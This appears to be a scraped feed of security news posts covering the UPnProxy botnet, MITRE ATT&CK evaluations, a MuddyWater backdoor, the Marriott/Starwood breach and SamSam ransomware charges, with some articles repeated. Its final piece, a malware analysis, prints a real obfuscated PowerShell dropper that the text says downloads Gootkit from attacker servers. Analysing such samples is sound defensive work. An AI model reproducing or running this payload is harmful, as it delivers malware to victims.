·      Dissecting the Mindscrew-Powershell Obfuscation
·      Knock-Knock Docker!! Will you let me in? Open API Abuse in Docker Containers
·      U.S. DoJ charges Iranian duo over SamSam Ransomware activity
·      327 million Marriott guests affected in Starwood Data Breach
·      New PowerShell-based Backdoor points to MuddyWater
·      ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools
·      MITRE evaluates Enterprise security products using the ATT&CK Framework

 

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 191 – News of the week appeared first on Security Affairs.

Massive Marriott Breach Underscores Risk of overlooking Data Liability

The Marriott breach underscores how companies fail to price in the risk of poor data security. In the age of GDPR, that could be an expensive failure. 

The post Massive Marriott Breach Underscores Risk of overlooking Data Liability appeared first on The Security Ledger.

Related Stories

Security Affairs: ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, threat actors are attempting to recruit them in a multi-purpose botnet.

In April, Akamai reported that threat actors compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug’N’Play (UPnP), experts tracked the botnet as UPnProxy.  Now the company provided an update to its initial analysis revealing a disconcerting scenario, UPnProxy is still up and running.

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

Experts recommend users to install routers update and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities are still unpatched, the experts found that out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy, and 45,000 have been compromised.

“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai tracked as EternalSilence, is targeting millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed (CVE-2017-7494) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections are have occurred , they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Experts observed millions of successful injections attempting to compromise millions of systems running SMB services, Akamai researchers speculate attackers are leveraging the Eternal family of exploits belonging to the NSA arsenal.

Hackers hijacked some 45,113 routers that expose a total of 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, that attackers are being opportunistic, they are scanning the Internet for SSDP and pivoting to the TCP UPnP daemons or is targeting a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely  leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – Daniel’s Hosting, dark web)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.



Security Affairs

ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools

Over 270,000 connected devices run vulnerable implementations of UPnP, threat actors are attempting to recruit them in a multi-purpose botnet.

In April, Akamai reported that threat actors compromised 65,000 home routers by exploiting vulnerabilities in Universal Plug’N’Play (UPnP), experts tracked the botnet as UPnProxy.  Now the company provided an update to its initial analysis revealing a disconcerting scenario, UPnProxy is still up and running.

The UPnP communication protocol is widely adopted even if it is known to be vulnerable. In early 2013, researchers at Rapid7 published an interesting whitepaper entitled “Security Flaws in Universal Plug and Play” that evaluated the global exposure of UPnP-enabled network devices.

The report highlighted that over 23 million IPs related to Portable UPnP SDK were vulnerable to remote code execution just through a single UDP packet, over 6,900 product versions from over 1,500 vendors were vulnerable through UPnP due to the exposure of UPnP SOAP service to the internet.

Abusing the protocol attackers can control the traffic in and out the networks, UPnP allows the automated negotiation and configuration of port opening/forwarding within a NATed networking environment.

The malicious botnet uncovered by Akamai is composed of vulnerable devices including malicious NAT injections, it turns routers into proxies, for this reason, the experts called the injected devices UPnProxy.

Experts recommend users to install routers update and patched firmware to mitigate the threat. According to Akamai, many UPnP vulnerabilities are still unpatched, the experts found that out of a pool of 3.5 million potentially vulnerable routers, 277,000 were still open to UPnProxy, and 45,000 have been compromised.

“In Akamai’s previous research, we highlighted the possibility that attackers could leverage UPnProxy to exploit systems living behind the compromised router. Unfortunately, data from this recent batch of injections suggests this is exactly what’s happening.” Akamai notes

“For home users, these attacks can lead to a number of complications, such as degraded service, malware infections, ransomware, and fraud. But for business users, these recent developments could mean systems that were never supposed to exist on the internet in the first place, could now be living there unknowingly, greatly increasing their chances of being compromised. Even more concerning, the services being exposed by this particular campaign have a history of exploitation related to crippling worms and ransomware campaigns targeting both Windows and Linux platforms.”

The latest campaign observed by Akamai tracked as EternalSilence, is targeting millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed (CVE-2017-7494) exploits.

“Taking current disclosures and events into account, Akamai researchers believe that someone is attempting to compromise millions of machines living behind the vulnerable routers by leveraging the EternalBlue and EternalRed exploits.” continues Akamai.

“Unfortunately, Akamai researchers are not able to see what happens after the injections are have occurred , they can only see the injections themselves and not the final payloads that would be directed at the machines exposed. However, a successful attack could yield a target rich environment, opening up the chance for such things as ransomware attacks, or a persistent foothold on the network.”

Experts observed millions of successful injections attempting to compromise millions of systems running SMB services, Akamai researchers speculate attackers are leveraging the Eternal family of exploits belonging to the NSA arsenal.

Hackers hijacked some 45,113 routers that expose a total of 1.7 million unique machines to the attackers.

“Additionally, there is no way to tell if EternalBlue or EternalRed was used to successfully compromise the exposed machine. However, if only a fraction of the potentially exposed systems were successfully compromised and fell into the hands of the attackers, the situation would quickly turn from bad to worse,” states Akamai.

According to the experts, that attackers are being opportunistic, they are scanning the Internet for SSDP and pivoting to the TCP UPnP daemons or is targeting a set of devices that use static ports (TCP/2048) and paths (/etc/linuxigd/gatedesc.xml) for their UPnP daemons.

“Criminals are clever, and will take any advantage they can get when it comes to exploiting systems and services. So, while it is unfortunate to see UPnProxy being actively leveraged to attack systems previously shielded behind the NAT, it was bound to happen eventually.” concludes Akamai. “That these attacks likely  leverage two well-known vulnerabilities, which have been patched for some time, should come as no surprise.”

Pierluigi Paganini

(Security Affairs – UPnProxy, NSA hacking tools)

The post ETERNALSILENCE – 270K+ devices vulnerable to UPnProxy Botnet build using NSA hacking tools appeared first on Security Affairs.

Moscow’s cable car service shuts down in 2 days after ransomware attack

By Waqas

The first cable-car service was launched in Moscow this Tuesday, and free rides to and from Luzhniki Stadium were promised to the visitors throughout the first month. Naturally, people were eager to ride the cable-car and thronged the location. However, much to their dismay, only after a few days the service got attacked with ransomware. […]

This is a post from HackRead.com Read the original post: Moscow’s cable car service shuts down in 2 days after ransomware attack

Security Affairs: MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.



Security Affairs

MITRE evaluates Enterprise security products using the ATT&CK Framework

The MITRE Corporation’s ATT&CK framework has been used to evaluate the efficiency of several enterprise security products designed by several vendors.

In April, MITRE announced a new service based on its ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge) framework to evaluate products based on their ability in detecting advanced persistent threats.

The MITRE ATT&CK evaluation service evaluates endpoint detection and response products for their ability to detect advanced threats.

“There are a lot of products on the market that try to detect adversary behavior, and we’re trying to figure out what they can do,” says Frank Duff, principle cybersecurity engineer at MITRE.

Duff explained MITRE adopt a transparent methodology and knowledge base that will make easy to interpret results obtained with its service.

ATT&CK framework

In the first phase, MITRE offered the possibility to evaluate the service and its efficiency on a case study on APT3/Gothic Panda cyber espionage group.

APT3 (aka UPS Team, Gothic Panda, Buckeye and TG-0110) is a China-linked APT group, it operates under the control of the China’s Ministry of State Security. The cyber espionage group is responsible for several cyber espionage campaigns, including Operation Clandestine Fox, Operation Clandestine Wolf, and Operation Double Tap.  As of June 2015, the group appears to have shifted from targeting primarily US victims to primarily political organizations in Hong Kong. 

The first tests of the ATT&CK framework conducted by Mitre evaluatedthe ability of products from Carbon Black, CrowdStrike, CounterTack, Endgame, Microsoft, RSA and SentinelOne to detect the APT3 cyberespionage group.

The tests are focused on the product’s capabilities of detecting malicious activities typically carried out by the threat actors once they have compromised the system of an organization. It is important to highlight that the MITRE ATT&CK framework does not assign scores to each product, it is not designed as a comparison tool.

“Direct comparison between vendor capabilities is complicated, and we encourage anyone using our results to consider other factors we didn’t evaluate. Our evaluations are narrowly focused on the technical ability to detect adversary behavior.” Duff wrote in a blog post.

“There are other factors we are not accounting for in our evaluations that should be considered by decision makers as they decide which tool best fits their needs,” Duff said. “You should consider factors such as cost of ownership, sophistication of your Security Operations Center, environmental noise, integration with other tools, user interface, security policies, and other factors. One product may not fit every need, and products can address different needs in different ways.”

MITRE worked with vendors during the evaluations and sharing with them the results.

“We approach the evaluations with a collaborative, “purple-teaming” mindset, and we think this allows us to better articulate what a vendor’s capability can do than if we left them out of the process. During the evaluation, MITRE and the vendor are in open communication.” 

“The vendor then shows us their detections and describes their process so that we can verify the detection. Since our goal is to capture different detection methods, we may even suggest to the vendor how their capability might have detected the behavior.”

The initial evaluations included the above vendors that signed up before the June 30, 2018 cohort deadline

Pierluigi Paganini

(Security Affairs – Mitre, ATT&CK Framework)

The post MITRE evaluates Enterprise security products using the ATT&CK Framework appeared first on Security Affairs.

New PowerShell-based Backdoor points to MuddyWater

Security researchers at Trend Micro recently discovered PowerShell-based backdoor that resembles a malware used by MuddyWater threat actor.

Malware researchers at Trend Micro have discovered a Powershell-based backdoor that is very similar to a malware used by MuddyWater APT group.

The first MuddyWater campaign was observed in late 2017, then researchers from Palo Alto Networks were investigating a mysterious wave of attacks in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing these attacks that took place between February and October 2017 targeting entities in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

Threat actors used PowerShell-based first stage backdoor named POWERSTATS, across the time the hackers changed tools and techniques.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by TEMP.Zagros group (another name used by the experts to track the MuddyWater), targeting Asia and Middle East regions from January 2018 to March 2018.

In the latest attacks detected by Trend Micro, threat actors used TTPs compatible with MuddyWater, the malicious code was uploaded to Virus Total from Turkey. The attackers used decoy documents that would drop a new PowerShell backdoor that is similar to MuddyWater’s POWERSTATS malware.

“These documents are named Raport.doc or Gizli Raport.doc (titles mean “Report” or “Secret Report” in Turkish) and maliyeraporti (Gizli Bilgisi).doc (“finance (Confidential Information)” in Turkish) — all of which were uploaded to Virus Total from Turkey.states Trend Micro.

“Our analysis revealed that they drop a new backdoor, which is written in PowerShell as MuddyWater’s known POWERSTATS backdoor. But, unlike previous incidents using POWERSTATS, the command and control (C&C) communication and data exfiltration in this case is done by using the API of a cloud file hosting provider.”

The new backdoor uses the API of a cloud file hosting provider to implement command and control (C&C) communication and data exfiltration.

The weaponized documents contain images showing blurry logos belonging to some Turkish government organizations, they trick victims into enabling macros to display the document properly.

MuddyWater

The macros contain strings encoded in base52, a technique that is not common and that was used by MuddyWater in past attacks. Once enabled, the macros will drop a .dll file (with a PowerShell code embedded) and a .reg file into %temp%directory.

The PowerShell code has several layers of obfuscation, the backdoor initially collects the system information and concatenates various pieces of information (i.e. OS name, domain name, user name, IP address) into one long string.

For communication, the malware uses files named <md5(hard disk serial number)> with various extensions associated with the purpose of the file:

  • .cmd – text file with a command to execute
  • .reg – system info as generated by myinfo() function, see screenshot above
  • .prc – output of the executed .cmd file, stored on local machine only
  • .res – output of the executed .cmd file, stored on cloud storage

“In both the older version of the MuddyWater backdoor and this recent backdoor, these files are used as an asynchronous mechanism instead of connecting directly to the machine and issuing a command.” continues the experts.

“The malware operator leaves a command to execute in a .cmd file, and comes back later to retrieve the .res files containing the result of the issued command.”

The malware supports various commands including file upload, persistence removal, exit, file download, and command execution.

Experts concluded that the attacks aimed at Turkish government organizations related to the finance and energy sectors that were also hit by MuddyWater in the past.

“This is yet another similarity with previous MuddyWater campaigns, which were known to have targeted multiple Turkish government entities.” concludes Trend Micro.

“If the group is responsible for this new backdoor, it shows how they are improving and experimenting with new tools,” Trend Micro concludes.

Pierluigi Paganini

(Security Affairs – MuddyWater, backdoor)

 

The post New PowerShell-based Backdoor points to MuddyWater appeared first on Security Affairs.

Hacker hijacks 50,000 printers to tell people to subscribe to PewDiePie

Over the course of this week, some printers have been printing out a strange message asking people to subscribe to PewDiePie's YouTube channel. The message appears to be the result of a simple exploit that allows printers to receive data over the internet, including print commands. A person with the online handle TheHackerGiraffe has claimed responsibility for the attack.

Via: The Verge

Source: TheHackerGiraffe

327 million Marriott guests affected in Starwood Data Breach

Starwood Data Breach – Hackers accessed the guest reservation system of the Marriot owned Starwood since 2014 and copied and encrypted the information.

Marriott International is the last victim of a long string of data breaches, the company announced that hackers compromised guest reservation database at its subsidiary Starwood hotels and stolen personal details of about 500 million guests.

“The company has not finished identifying duplicate information in the database, but believes it contains information on up to approximately 500 million guests who made a reservation at a Starwood property.” reads the data breach notification published by Marriot.

“For approximately 327 million of these guests, the information includes some combination of name, mailing address, phone number, email address, passport number, Starwood Preferred Guest (“SPG”) account information, date of birth, gender, arrival and departure information, reservation date, and communication preferences.”

This is one of the largest data breaches in history, the biggest one for the hospitality industry.

Marriott International has bought Starwood Hotels and Resorts Worldwide in 2016 for $13 billion. The brand includes St. Regis, Sheraton Hotels & Resorts, W Hotels, Westin Hotels & Resorts, Aloft Hotels, Tribute Portfolio, Element Hotels, Le Méridien Hotels & Resorts, The Luxury Collection, Four Points by Sheraton and Design Hotels.

According to the company, hackers accessed to the Starwood’s guest reservation system since 2014 and copied and encrypted the information.

The intrusion was detected on September 8 when a monitoring system found evidence regarding an attempt to access the Starwood guest reservation database in the United States. Two months later, on November 19, an investigation confirmed the intrusion into the archive containing “guest information relating to reservations at Starwood properties on or before September 10, 2018.”

Unknown hackers accessed personal information of nearly 327 million guests, compromised records include names, mailing addresses, phone numbers, email addresses, passport numbers, dates of birth, genders, arrival and departure information, reservation date.

Starwood Data Breach

The investigation in the Starwood Data Breach revealed that stolen data also includes financial data, payment card numbers and payment card expiration dates were exposed, even if in an encrypted format.

“For some, the information also includes payment card numbers and payment card expiration dates, but the payment card numbers were encrypted using Advanced Encryption Standard encryption (AES-128).” continues the data breach notification.
“There are two components needed to decrypt the payment card numbers, and at this point, Marriott has not been able to rule out the possibility that both were taken.  For the remaining guests, the information was limited to name and sometimes other data such as mailing address, email address, or other information.”

According to Marriott, hackers did not access the Marriott network.

The company reported the incident to the law enforcement and data protection authorities, it is also notifying potentially impacted customers.

According to the EU General Data Protection Regulation (GDPR) regulation, Marriott could face a maximum fine of 20 million euros or 4 percent of its annual global revenue if data protection authorities

Pierluigi Paganini

(Security Affairs – Starwood Data Breach, Marriot)

The post 327 million Marriott guests affected in Starwood Data Breach appeared first on Security Affairs.

Marriott hotel data breach: Sensitive data of 500 million guests stolen

By Waqas

Marriott has announced that it has suffered a massive data breach after attackers hacked its guest reservation system at Starwood hotels, a group of hotels the company took over in 2016 – These hotels include Sheraton, St. Regis, Westin and W Hotels. The breach was discovered last week after Marriott’s internal security tool alerted the company regarding an attempt to access the […]

This is a post from HackRead.com Read the original post: Marriott hotel data breach: Sensitive data of 500 million guests stolen

That Bloomberg Supply-Chain-Hack Story

Back in October, Bloomberg reported that China has managed to install backdoors into server equipment that ended up in networks belonging to -- among others -- Apple and Amazon. Pretty much everybody has denied it (including the US DHS and the UK NCSC). Bloomberg has stood by its story -- and is still standing by it.

I don't think it's real. Yes, it's plausible. But first of all, if someone actually surreptitiously put malicious chips onto motherboards en masse, we would have seen a photo of the alleged chip already. And second, there are easier, more effective, and less obvious ways of adding backdoors to networking equipment.

Dunkin Donuts Perks loyalty data breach: Change your password

By Waqas

Dunkin Donuts says it has suffered a data breach in which customer data of its DD Perks loyalty program may have been stolen – The DD Perk is a reward program for the company’s regular customers. According to a now-inaccessible security advisory, Dunkin Donuts stated that the data breach was initially detected on October 31st forcing it to […]

This is a post from HackRead.com Read the original post: Dunkin Donuts Perks loyalty data breach: Change your password

Feds charge 2 Iranian hackers behind SamSam ransomware attacks

By Waqas

The United States Department of Justice has charged two Iranian nationals with allegedly developing and using SamSam ransomware against their targets in the United States and Canada to carry out computer hacking and extortion scheme from Iran. Both Mohammad Mehdi Shah Mansouri, 27 and Faramarz Shahi Savandi, 34 have been charged with six counts together with one count of conspiracy […]

This is a post from HackRead.com Read the original post: Feds charge 2 Iranian hackers behind SamSam ransomware attacks

Dissecting the Mindscrew-Powershell Obfuscation

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims of a recent attack.

Introduction

Few days ago, the CERT-Yoroi bulletin N061118 disclosed a dangerous campaign attacking several Italian users. The attack wave contained some interesting techniques need to look into further, especially regarding the obfuscation used to hide the malicious dropping infrastructure.

The Yoroi-Cybaze ZLAB dissected the VBS script embedded into the zip archives delivered to the victims,  finding an inner powershell payload designed to actually download the malicious Gootkit binary from the attacker’s infrastructure. This inner script was carefully obfuscated in a clever and unseen way.

Technical Analysis

The Powershell code executed by the initial VBS script appears as following:

  1. ( ‘…..’|%{${#/~} =+ $()}{ ${@}=${#/~}} { ${/.} = ++${#/~}}{ ${*~}=(${#/~} =${#/~} +${/.})} {${$./} =(${#/~}= ${#/~} + ${/.} )}{${)@}=( ${#/~}=${#/~}+${/.} )} { ${‘} =(${#/~} =${#/~}+ ${/.}) } { ${;} = ( ${#/~}=${#/~} + ${/.}) } {${ *-}= ( ${#/~}=${#/~}+${/.})} {${“[+} = ( ${#/~} =${#/~} +${/.} ) } { ${#~=}= ( ${#/~}= ${#/~}+ ${/.} )} { ${“@} =”[” +”$(@{ } ) “[${ *-} ] + “$(@{})”[ “${/.}” +”${#~=}” ]+ “$(@{ })”[“${*~}”+”${@}”]+”$? “[${/.} ]+”]” }{${#/~} = “”.(“$( @{} )”[ “${/.}${)@}” ]+”$(@{ }) “[“${/.}${;}”] + “$( @{ } ) “[ ${@}]+ “$(@{} ) “[ ${)@}]+ “$?”[${/.}] + “$( @{ } ) “[${$./} ])}{${#/~} =”$( @{} ) “[ “${/.}${)@}”] + “$( @{ } )”[${)@}] +”${#/~}”[ “${*~}${ *-}”]} ); .${#/~} (“${#/~} (${“@}${/.}${@}${‘} + ${“@}${/.}${@}${*~} +${“@}${)@}${@}+ ${“@}${$./}${;}+${“@}${/.}${@}${)@} +${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;} +${“@}${)@}${;}+${“@}${/.}${/.}${“[+}+${“@}${/.}${@}${/.}+${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${‘}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${@}+${“@}${)@}${;}+ ${“@}${/.}${@}${#~=} + ${“@}${#~=}${ *-}+ ${“@}${/.}${@}${;}+ ${“@}${/.}${/.}${/.} +${“@}${/.}${/.}${)@}+ ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${/.}${@}${“[+} + ${“@}${/.}${/.}${;}+ ${“@}${$./}${*~} +${“@}${‘}${/.} + ${“@}${)@}${/.}+ ${“@}${/.}${*~}${$./} + ${“@}${ *-}${$./}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${)@}+${“@}${/.}${/.}${;}+ ${“@}${)@}${‘}+${“@}${ *-}${ *-}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${@}+ ${“@}${/.}${/.}${ *-}+${“@}${/.}${@}${“[+} +${“@}${/.}${@}${/.}+${“@}${$./}${*~} +${“@}${;}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${;}+${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@}+ ${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${@}${*~} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${)@} + ${“@}${/.}${*~}${‘}+${“@}${$./}${*~} +${“@}${“[+}${$./} + ${“@}${/.}${/.}${;} + ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} + ${“@}${;}${;} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${‘}+${“@}${“[+}${)@} +${“@}${/.}${/.}${)@} +${“@}${#~=}${ *-} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${‘}+${“@}${/.}${@}${*~} +${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${)@} + ${“@}${$./}${*~}+${“@}${)@}${‘}+ ${“@}${“[+}${$./}+ ${“@}${/.}${/.}${/.}+ ${“@}${/.}${/.}${ *-} + ${“@}${/.}${/.}${)@}+ ${“@}${#~=}${#~=}+${“@}${/.}${@}${/.} + ${“@}${$./}${*~}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${;} + ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${‘}+${“@}${‘}${“[+}+ ${“@}${)@}${ *-}+${“@}${)@}${ *-}+${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${)@} + ${“@}${/.}${@}${/.} + ${“@}${/.}${@}${@} + ${“@}${/.}${@}${‘}+${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${*~} +${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${‘}+ ${“@}${/.}${/.}${;}+ ${“@}${/.}${/.}${/.} + ${“@}${)@}${;}+${“@}${/.}${@}${#~=}+ ${“@}${#~=}${ *-}+${“@}${/.}${/.}${;} +${“@}${/.}${/.}${;} +${“@}${/.}${/.}${*~}+ ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${@}+${“@}${/.}${/.}${‘}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${#~=} + ${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${‘} +${“@}${/.}${/.}${;} + ${“@}${)@}${;}+ ${“@}${#~=}${#~=} + ${“@}${/.}${/.}${/.} + ${“@}${/.}${@}${#~=}+ ${“@}${)@}${ *-} + ${“@}${#~=}${#~=}+ ${“@}${/.}${/.}${/.}+${“@}${/.}${@}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${/.}${@}+${“@}${/.}${@}${‘} + ${“@}${/.}${/.}${“[+} + ${“@}${)@}${ *-}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@} + ${“@}${/.}${/.}${;}+${“@}${/.}${@}${/.}+ ${“@}${/.}${/.}${)@}+${“@}${)@}${;} + ${“@}${/.}${/.}${*~}+ ${“@}${/.}${@}${)@} +${“@}${/.}${/.}${*~} + ${“@}${‘}${‘} +${“@}${$./}${*~}+${“@}${)@}${‘}+${“@}${;}${“[+}+ ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+ ${“@}${/.}${/.}${@}+ ${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${;}+${“@}${/.}${@}${‘}+${“@}${/.}${/.}${/.} + ${“@}${/.}${/.}${@} +${“@}${$./}${*~} + ${“@}${$./}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} + ${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} +${“@}${/.}${@}${/.}+ ${“@}${/.}${@}${#~=}+ ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;} +${“@}${/.}${*~}${@}+ ${“@}${/.}${@}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${#~=}+ ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@} + ${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${ *-}+${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=}+ ${“@}${)@}${;}+${“@}${/.}${@}${/.} +${“@}${/.}${*~}${@}+${“@}${/.}${@}${/.} + ${“@}${‘}${#~=}+ ${“@}${$./}${*~}+ ${“@}${“[+}${$./} + ${“@}${/.}${/.}${;}+${“@}${#~=}${ *-}+ ${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${;} + ${“@}${)@}${‘} +${“@}${“[+}${@}+${“@}${/.}${/.}${)@} +${“@}${/.}${/.}${/.}+ ${“@}${#~=}${#~=}+ ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${‘} +${“@}${/.}${/.}${‘} +${“@}${$./}${*~} +${“@}${$./}${;} +${“@}${/.}${@}${/.}+${“@}${/.}${/.}${@}+ ${“@}${/.}${/.}${“[+} +${“@}${‘}${“[+} + ${“@}${/.}${/.}${;} + ${“@}${/.}${@}${/.} +${“@}${/.}${@}${#~=} + ${“@}${/.}${/.}${*~} + ${“@}${#~=}${*~}+ ${“@}${/.}${@}${ *-}+ ${“@}${/.}${/.}${‘} + ${“@}${/.}${@}${;}+${“@}${/.}${*~}${@}+${“@}${/.}${@}${;} +${“@}${/.}${@}${/.} +${“@}${/.}${/.}${#~=} +${“@}${/.}${/.}${ *-}+ ${“@}${/.}${@}${)@}+ ${“@}${/.}${/.}${ *-} +${“@}${/.}${@}${ *-} + ${“@}${/.}${@}${/.} + ${“@}${/.}${/.}${#~=}+${“@}${)@}${;} +${“@}${/.}${@}${/.} + ${“@}${/.}${*~}${@} + ${“@}${/.}${@}${/.} )”)

It seems a set of random special characters without any meaning. However, the Powershell interpreter can execute it quietly. So, after an accurate analysis, it is possible to see some pattern in the weird characters following the “$” symbol: in Powershell language is possible to declare variables using the pattern ${variable_name}, including any character between the braces, special characters doesn’t make exception. For  instance, some of variable names in the script above are:

  1. ${#/~}
  2. ${@}
  3. ${;}
  4. ${“@}
  5. ${#~=}
  6. ${/.}
  7. ${*~}

